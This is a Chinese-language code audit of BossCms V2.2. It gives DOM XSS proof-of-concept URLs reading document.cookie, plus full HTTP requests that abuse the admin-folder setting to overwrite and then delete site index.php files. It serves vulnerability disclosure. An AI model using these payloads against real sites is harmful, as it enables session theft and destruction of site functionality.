BossCms V2.2 代码审计

渗透技巧 10个月前 admin
128 0 0

前言

PS:这次本来想当 0day 发出来的,但是这边担心厂商投诉,所以只能等厂商修补了之后再发…

.

BossCms V2.2 代码审计

.

BossCms V2.2 代码审计

.

源码

地址:https://www.bosscms.net/download/

BossCms V2.2

.

global.js 缺陷导致的 DOM 型 XSS

这个漏洞我是在前台的 feedback 功能点找到的

在我成功提交反馈的时候会弹出个提示,告诉我提交成功

它是一个这样的 url 链接

http://bosscms.test.com/feedback/#_alert=%E5%8F%8D%E9%A6%88%E6%8F%90%E4%BA%A4%E6%88%90%E5%8A%9F%EF%BC%81,green

我看到说既然可控又会渲染到前端,那就尝试下 XSS 吧

然后使用以下 Poc 成功弹窗

http://bosscms.test.com/feedback/#_alert="><img src=# onerror=alert(document.cookie)>,green

.

BossCms V2.2 代码审计

.

我就开始翻代码找漏洞点

一开始还以为是某个传参的过滤不严谨

发现 /system/basic/func/global.func.php 存在个有缺陷的 alert 函数

function alert($str, $type=null, $color=null){
global $G;
if(arrExist($G,'get|jsonmsg')){
$js = json::encode(array('state'=>$type?$type:'success','msg'=>$str));
}else{
if($type=='close'){
$js .= "<script>alert('{$str}');window.close();</script>";
}else if($type=='reload'){
$js .= "<script>alert('{$str}');parent.location.reload();</script>";
}else if($type==null){
location($_SERVER['HTTP_REFERER'].'#_alert='.urlencode($str).','.($color?$color:'red'));
}else{
location($type.'#_alert='.urlencode($str).','.($color?$color:'green'));
}
}
die($js);
}

可以发现,如果在调用这个函数之前没做任何的特殊字符 HTML 字符实体化的话

那只要第一个参数可控,就一定会导致一个 XSS 漏洞的产生了

但后面在测的时候猛然发现,不对啊?我没传参啊?!

然后我搜全局,才发现端倪

多说无益,先看看下面这段 JavaScript 代码

var at = window.location.hash.match(/#_alert=(.+?),(red|green|blue|yellow|gold)/);

if(at){
_alert(decodeURI(at[1]),at[2]);
window.location.hash = window.location.hash.replace(at[0],'');
}

function _alert(str, type){
var date = new Date();
now = date.getTime();
$('body').append('<h6 class="alert '+type+'" time="'+now+'" style="z-index:'+now+';"><b>'+str+'</b></h6>');
tha = $('h6.alert[time="'+now+'"]');
tha.animate({top:78,opacity:1},288);
(function(tha){
window.setTimeout(function(){
tha.remove();
},
tha.hasClass('green')?3000:2000);
})(tha);
}

大体上就是说,它会截取我 URL 中 # 后面的字符

匹配正则之后直接拼接 HTML 然后添加到 body 标签下了

也就是说,只要加载了存在上述代码的 Js 文件

那最终就会导致一个 Dom 型 XSS 的产生

目前发现的两个地方都可以触发 XSS

1. /feedback/#_alert="><img src=# onerror=alert(document.cookie)>,green
2. /admin/#_alert="><img src=# onerror=alert(document.cookie)>,green

而存在问题的 js 文件暂时发现了这两个:global.js 和 bosscms.js

.

后台安全设置模块存在逻辑缺陷

漏洞点主要出现在 /system/admin/safe/safe.class.php 文件

核心在于以下两段代码:

public function init()
{
global $G;
$G['cover'] = $this->cover();
if(preg_match("/^w+$/", $old=arrExist($G['get'],'old_folder'))){
if(is_file(ROOT_PATH.$old.'/index.php')){
$str = file_get_contents(ROOT_PATH.$old.'/index.php');
$res = dir::read(ROOT_PATH.$old.'/');
if(strstr($str,"define('IS_INSIDE',true);") && count($res['file'])==1){
dir::remove(ROOT_PATH.$old.'/');
}
}
}
echo $this->theme('safe/safe');
}

public function add()
{
global $G;
$this->cover('safe','M');
if(isset($G['post'])){
if(!$G['post']['admin_folder']){
alert('后台文件夹不能为空!');
}
$BOSSCMS;
$data = array(
'page_cache_time' => $G['post']['page_cache_time'],
'upload_rename' => $G['post']['upload_rename'],
'upload_maxsize' => $G['post']['upload_maxsize'],
'upload_extension' => preg_replace('/\"(w)/','".$1',$G['post']['upload_extension']),
'upload_web_allow' => $G['post']['upload_web_allow'],
'upload_repeat' => $G['post']['upload_repeat'],
'ueditor_catchimage' => $G['post']['ueditor_catchimage']
);
foreach($data as $k=>$v){
mysql::select_set(array('name'=>$k,'value'=>$v,'parent'=>'0','type'=>'0','lang'=>'0'),'config',array('value'));
}

$data = array(
'admin_login_captcha' => $G['post']['admin_login_captcha'],
'admin_logout_time' => $G['post']['admin_logout_time'],
'admin_login_errnum' => $G['post']['admin_login_errnum'],
'admin_login_errtime' => $G['post']['admin_login_errtime'],
'window_full' => $G['post']['window_full']
);
foreach($data as $k=>$v){
mysql::select_set(array('name'=>$k,'value'=>$v,'parent'=>'0','type'=>'1','lang'=>'0'),'config',array('value'));
}

if($G['path']['folder'] != $G['post']['admin_folder']){
if(!preg_match("/^w+$/", $G['post']['admin_folder'])){
alert('文件夹名称必须为英文、数字、下划线等字符');
}
dir::copydir(ROOT_PATH.$G['path']['folder'].'/', ROOT_PATH.$G['post']['admin_folder'].'/');
alert('操作成功', '../'.$G['post']['admin_folder'].'/'.url::mpf('safe','safe','init',array('admin_folder'=>$G['post']['admin_folder'],'old_folder'=>$G['path']['folder'])));
}else{
alert('操作成功', url::mpf('safe','safe','init'));
}
}
}

这个功能点是用于更改后台路径的地址的

默认的后台路径是 admin,也就是配置文件中 $G['path']['folder'] 的值

我们可以通过传入 admin_folder 调用 add 方法来将 admin 改为 POST 进来的 admin_folder 的值

这里最大的问题就是它把完整的操作流程拆成两个部分

而完成第一部分后的第二部分它是选择使用重定向的方式去调用

先来大概说下它的具体流程:

  1. 调用 add 方法 拿 POST 传入的 admin_folder (新后台路径) 去当做参数调用 copydir 方法。

  2. copydir 方法会以 admin_folder 为名创建一个新的后台目录,然后将旧后台目录的所有文件复制过去。

  3. 最后通过重定向去调用 init 方法,将旧的后台目录删除。

梳理完完整的流程之后我们会发现,我们实际上是可以单独调用 add 方法和 init 方法去实现一些东西的

.

文件覆盖

以 feedback 为例

我们可以调用 add 方法将传入的 admin_folder 的值改为 feedback (BossCMS 中负责意见反馈的文件的目录)

这样它会让旧的 index.php 把 feedback/index.php 的内容给覆盖掉

.

BossCms V2.2 代码审计

.

将 feedback 当做 admin_folder 的值然后调用 add 方法

POST /admin/?mold=safe&part=safe&func=add HTTP/1.1
Host: bosscms.test.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------4172384995493174183638070831
Content-Length: 1872
Origin: http://bosscms.test.com
Connection: close
Referer: http://bosscms.test.com/admin/?mold=safe&part=safe&func=init
Cookie: iframeScroll=; iframeMainTab=; bosscms4e1427ce3574583f353588d8a3dfb0c6=kd55i3f11352vk1cs5ou9d1p06; viewScrollY=; viewKindTag=core; viewScreen=pc
Upgrade-Insecure-Requests: 1

-----------------------------4172384995493174183638070831
Content-Disposition: form-data; name="admin_folder"

feedback
-----------------------------4172384995493174183638070831
Content-Disposition: form-data; name="admin_login_captcha"

0
-----------------------------4172384995493174183638070831
Content-Disposition: form-data; name="admin_captcha_type"

0
-----------------------------4172384995493174183638070831
Content-Disposition: form-data; name="admin_logout_time"

28888
-----------------------------4172384995493174183638070831
Content-Disposition: form-data; name="admin_login_errnum"

6
-----------------------------4172384995493174183638070831
Content-Disposition: form-data; name="admin_login_errtime"

3600
-----------------------------4172384995493174183638070831
Content-Disposition: form-data; name="window_full"

0
-----------------------------4172384995493174183638070831
Content-Disposition: form-data; name="upload_rename"

1
-----------------------------4172384995493174183638070831
Content-Disposition: form-data; name="upload_maxsize"

2
-----------------------------4172384995493174183638070831
Content-Disposition: form-data; name="upload_extension"

[".jpg",".png",".jpeg",".gif",".mp4",".mp3",".pdf",".doc",".xls",".xlsx",".bmp",".csv",".ico",".JPG",".phtml"]
-----------------------------4172384995493174183638070831
Content-Disposition: form-data; name="upload_web_allow"

0
-----------------------------4172384995493174183638070831
Content-Disposition: form-data; name="upload_repeat"

0
-----------------------------4172384995493174183638070831
Content-Disposition: form-data; name="page_cache_time"

0
-----------------------------4172384995493174183638070831
Content-Disposition: form-data; name="ueditor_catchimage"

0
-----------------------------4172384995493174183638070831--

然后就变成如下图所示的内容

.

BossCms V2.2 代码审计

.

这个时候如果去访问 feedback 就会显示后台的页面(没登录就是后台登陆页面)

文件删除

这个文件删除的条件是比较严格的,但结合上面这个文件覆盖可以起到稍稍好一点的效果

此处是调用 init 方法对特定目录下的文件进行删除,具体要满足以下几个条件

  1. 该目录必须为后台路径,且存在 define('IS_INSIDE',true); 字段。

  2. 该目录的名称必须为数字大小写字母下划线。

  3. 该路径下必须只有一个文件,且名称必须为 index.php。

这个如果没有前面的文件覆盖的话,将几乎无法利用

但如果能结合覆盖来用,就可以实现删除前台的所有入口文件和管理员的登录后台文件

感染 & 删除

感染是指将 admin/index.php 的内容覆盖任何 xxx/index.php 文件

此时,如果你尝试访问 xxx,你会发现它变成了一个后台页面

例如:我们要感染 feedback 的这个业务

用上面那个数据包对 feedback 下的 index.php 进行覆盖

.

BossCms V2.2 代码审计

.

尝试访问:bosscms.test.com/feedback/

.

BossCms V2.2 代码审计

.

发现变成了后台,此时则满足上述提到的删除文件的三个条件

调用 init 函数去删除改文件

GET /feedback/?mold=safe&part=safe&func=init&admin_folder=feedback&old_folder=admin HTTP/1.1
Host: bosscms.test.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://bosscms.test.com/admin/?mold=safe&part=safe&func=init
Connection: close
Cookie: iframeScroll=576%7E%7E%7E%3Fmold%3Dsafe%26part%3Dsafe%26func%3Dinit; iframeMainTab=; viewScrollY=; viewKindTag=core; viewScreen=pc; bosscms4e1427ce3574583f353588d8a3dfb0c6=ab9eksbfht4da09kmm98vqdhh4
Upgrade-Insecure-Requests: 1

feedback 下的 index.php 文件被删除了

.

BossCms V2.2 代码审计

.

所以基本上只要符合文件删除的特征的目录,都可以将里面的 index.php 文件给删除

借此,我写了个脚本,可以实现一键破坏前台+后台的所有功能点,只需要你拥有后台权限

(PS:测试的时候做好备份)

Exp

暂不提供

最后实现的效果就是网站所有功能点都 404

来源:https://xz.aliyun.com/  感谢【A2Cai


原文始发于微信公众号(衡阳信安):BossCms V2.2 代码审计

版权声明:admin 发表于 2023年8月22日 上午12:01。
转载请注明:BossCms V2.2 代码审计 | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...